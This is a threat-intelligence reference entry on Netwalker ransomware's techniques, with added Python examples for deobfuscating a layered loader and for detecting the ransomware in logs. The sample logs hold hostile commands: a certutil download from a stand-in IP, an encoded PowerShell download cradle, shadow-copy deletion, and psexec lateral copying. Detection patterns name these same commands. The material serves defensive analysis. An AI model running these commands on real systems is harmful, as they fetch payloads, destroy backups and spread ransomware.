
S0457 Netwalker

Netwalker is fileless ransomware written in PowerShell and executed directly in memory.[1]

ID: S0457
Associated Names: (none listed)
Type: MALWARE
Version: 1.1
Created: 26 May 2020
Last Modified: 22 March 2023

Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1059 | Command and Scripting Interpreter | - |
| Enterprise | T1059.001 | PowerShell | Netwalker has been written in PowerShell and executed directly in memory, so no payload file is written to disk for file-based defenses to inspect.[1][2] |
| Enterprise | T1059.003 | Windows Command Shell | Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.[2] |
| Enterprise | T1486 | Data Encrypted for Impact | Netwalker can encrypt files on infected machines to extort victims.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.[2] |
| Enterprise | T1562 | Impair Defenses | - |
| Enterprise | T1562.001 | Disable or Modify Tools | Netwalker can detect and terminate active security software-related processes on infected systems.[1][2] |
| Enterprise | T1105 | Ingress Tool Transfer | Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[2] |
| Enterprise | T1490 | Inhibit System Recovery | Netwalker can delete the infected system's Shadow Volumes to prevent recovery.[1][2] |
| Enterprise | T1570 | Lateral Tool Transfer | Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems.[2] |
| Enterprise | T1112 | Modify Registry | Netwalker can add the following registry entry: HKEY_CURRENT_USER\SOFTWARE\{8 random characters}.[1] |
| Enterprise | T1106 | Native API | Netwalker can use Windows API functions to inject the ransomware DLL.[1] |
| Enterprise | T1027 | Obfuscated Files or Information | - |
| Enterprise | T1027.009 | Embedded Payloads | Netwalker's DLL has been embedded within the PowerShell script in hex format.[1] |
| Enterprise | T1027.010 | Command Obfuscation | Netwalker's PowerShell script has been obfuscated with multiple layers, including base64 and hexadecimal encoding and XOR encryption, as well as obfuscated PowerShell functions and variables.[1][2] |
| Enterprise | T1055 | Process Injection | - |
| Enterprise | T1055.001 | Dynamic-link Library Injection | The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.[1] |
| Enterprise | T1489 | Service Stop | Netwalker can terminate system processes and services, some of which relate to backup software.[1] |
| Enterprise | T1518 | Software Discovery | - |
| Enterprise | T1518.001 | Security Software Discovery | Netwalker can detect and terminate active security software-related processes on infected systems.[1] |
| Enterprise | T1082 | System Information Discovery | Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.[1] |
| Enterprise | T1569 | System Services | - |
| Enterprise | T1569.002 | Service Execution | Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[2] |
| Enterprise | T1047 | Windows Management Instrumentation | Netwalker can use WMI to delete Shadow Volumes.[1] |
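The decoding chain that the T1140, T1027.009, T1027.010 and T1082 rows describe (base64 and XOR layers wrapping a script that carries the DLL as a hex string, with the host architecture checked to choose the right image) is easier to reason about with a runnable model. The following is an added example written for this page; it is not Netwalker's code and not from ATT&CK or its references. The XOR key, the single base64-over-XOR layering, the variable names `$dll64`/`$dll32` and the minimal fake PE images are all constructed. It shows how an analyst peels the outer layer, carves the embedded hex blobs and reads the COFF Machine field to tell which image a loader would select on a given host.

```python
import base64
import re
import struct

# COFF Machine values from the PE specification (real constants).
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

# Constructed XOR key for this example; a real loader script carries its own key material.
XOR_KEY = b"\x5a\x3c\x9f"


def build_fake_pe(machine: int) -> bytes:
    """Constructed stand-in for a DLL image: a 64-byte DOS header whose e_lfanew
    points at a PE signature followed by the COFF Machine field. It is enough
    for the architecture check below; it is not a loadable PE."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> offset 0x40
    coff = b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18
    return bytes(dos) + coff


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(inner_script: str, key: bytes = XOR_KEY) -> str:
    """Inner script -> XOR -> base64: the outer layer an analyst sees first."""
    return base64.b64encode(xor_bytes(inner_script.encode(), key)).decode()


def deobfuscate(outer_blob: str, key: bytes = XOR_KEY) -> str:
    """Peel the outer layer: base64-decode, then XOR with the recovered key."""
    return xor_bytes(base64.b64decode(outer_blob), key).decode()


# A PowerShell variable assigned a long hex string literal (64+ hex digits).
HEX_VAR = re.compile(r'\$(\w+)\s*=\s*"([0-9A-Fa-f]{64,})"')


def extract_hex_payloads(script: str) -> dict:
    """Carve hex-encoded blobs embedded in the decoded script and decode them."""
    return {name: bytes.fromhex(hexstr) for name, hexstr in HEX_VAR.findall(script)}


def pe_machine(image: bytes) -> int:
    """Read the COFF Machine field, which states the architecture the image targets."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<H", image, e_lfanew + 4)[0]


def select_payload(payloads: dict, host_bits: int):
    """Pick the embedded image whose Machine field matches the host (64 or 32 bit)."""
    wanted = IMAGE_FILE_MACHINE_AMD64 if host_bits == 64 else IMAGE_FILE_MACHINE_I386
    for name, image in payloads.items():
        if pe_machine(image) == wanted:
            return name, image
    raise LookupError(f"no embedded image for a {host_bits}-bit host")


# Constructed sample: an inner script carrying two hex-embedded images and an
# architecture check (IntPtr size) that picks between them.
INNER_SCRIPT = (
    '$dll64 = "%s"\n$dll32 = "%s"\n'
    '$img = if ([IntPtr]::Size -eq 8) { $dll64 } else { $dll32 }\n'
    % (build_fake_pe(IMAGE_FILE_MACHINE_AMD64).hex(),
       build_fake_pe(IMAGE_FILE_MACHINE_I386).hex())
)
OUTER_BLOB = obfuscate(INNER_SCRIPT)


def analyze(outer_blob: str = OUTER_BLOB, host_bits: int = 64):
    """Full chain: peel the outer layer, carve the hex blobs, choose by architecture.
    Returns (variable name, Machine value, all embedded variable names)."""
    script = deobfuscate(outer_blob)
    payloads = extract_hex_payloads(script)
    name, image = select_payload(payloads, host_bits)
    return name, pe_machine(image), sorted(payloads)


if __name__ == "__main__":
    print(analyze(host_bits=64))
    print(analyze(host_bits=32))
```

On a real sample the key and the layer order have to be recovered from the script itself; the useful habit the example encodes is to stop at each layer, look for an MZ header or a long hex run, and only then continue, rather than executing the script to see what it drops.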
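On the detection side, the T1105, T1570, T1490, T1047, T1112 and T1059.001 rows each name an observable operator or malware action. The following added example, written for this page and not part of ATT&CK or any vendor tooling, runs a small set of regular-expression rules over constructed Sysmon-style process and registry events and flags a host only when several distinct techniques from the table occur on it together. The log format, host names, command lines, the base64 string and the rule patterns are all this example's own assumptions.

```python
import re
from collections import defaultdict

# Rule table: technique id -> regex over the event's command line or registry
# target. The patterns are this example's own approximation of the behaviours
# in the table; tune them against your own telemetry before relying on them.
RULES = [
    ("T1105", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("T1570", re.compile(r"\bpsexec(\.exe)?\s+\\\\\S+\s+.*-c\b", re.I)),
    ("T1490", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"
                         r"|\bwmic(\.exe)?\s+shadowcopy\s+delete\b"
                         r"|win32_shadowcopy", re.I)),
    ("T1047", re.compile(r"\bwmic(\.exe)?\s+shadowcopy\b|win32_shadowcopy", re.I)),
    ("T1059.001", re.compile(r"\bpowershell(\.exe)?\b.*-(e|ec|enc|encodedcommand)\s+"
                             r"[A-Za-z0-9+/=]{40,}", re.I)),
    # HKCU\SOFTWARE\<exactly 8 alphanumerics>: noisy alone, useful in combination.
    ("T1112", re.compile(r"^HKCU\\SOFTWARE\\[A-Za-z0-9]{8}$", re.I)),
]

# Constructed events, one per line: host, event type, user, then either the
# process command line (cmd=) or the registry key written (target=).
SAMPLE_LOGS = r"""
host=WS01 type=process user=jsmith cmd=cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.5/update.png c:\users\public\nw.ps1
host=WS01 type=process user=jsmith cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA
host=WS01 type=registry user=jsmith target=HKCU\SOFTWARE\f9Ax3Qpz
host=WS01 type=process user=jsmith cmd=powershell.exe -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
host=WS01 type=process user=jsmith cmd=vssadmin.exe delete shadows /all /quiet
host=WS01 type=process user=SYSTEM cmd=psexec.exe \\FILESRV01 -c c:\users\public\run.bat
host=WS02 type=process user=bjones cmd=powershell.exe -nop -c Get-Date
host=WS02 type=process user=bjones cmd=certutil.exe -hashfile c:\temp\report.pdf SHA256
host=WS02 type=registry user=bjones target=HKCU\SOFTWARE\Contoso1
"""

LINE = re.compile(r"^host=(\S+) type=(\S+) user=(\S+) (?:cmd|target)=(.*)$")


def parse(line: str):
    """Parse one constructed event line; returns None for lines that do not fit."""
    m = LINE.match(line)
    if not m:
        return None
    host, kind, user, value = m.groups()
    return {"host": host, "type": kind, "user": user, "value": value}


def match_techniques(value: str) -> list:
    """Technique ids whose rule matches this command line or registry target."""
    return [tid for tid, rx in RULES if rx.search(value)]


def triage(log_text: str, min_techniques: int = 2) -> dict:
    """Return {host: sorted technique ids} for hosts where at least
    min_techniques distinct techniques from the table were observed."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        event = parse(line)
        if event is None:
            continue
        for tid in match_techniques(event["value"]):
            seen[event["host"]].add(tid)
    return {host: sorted(tids) for host, tids in seen.items() if len(tids) >= min_techniques}


if __name__ == "__main__":
    for host, tids in triage(SAMPLE_LOGS).items():
        print(f"{host}: {', '.join(tids)}")
```

The correlation threshold is the point of the example: the registry pattern on its own also fires on WS02 for a perfectly ordinary eight-character vendor key, and `certutil -hashfile` is legitimate use, so neither host is raised on a single match. The `-enc` pattern only approximates the PowerShell row; a script run in memory from an unencoded command line needs script block logging (Event ID 4104) rather than command-line matching to catch.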

References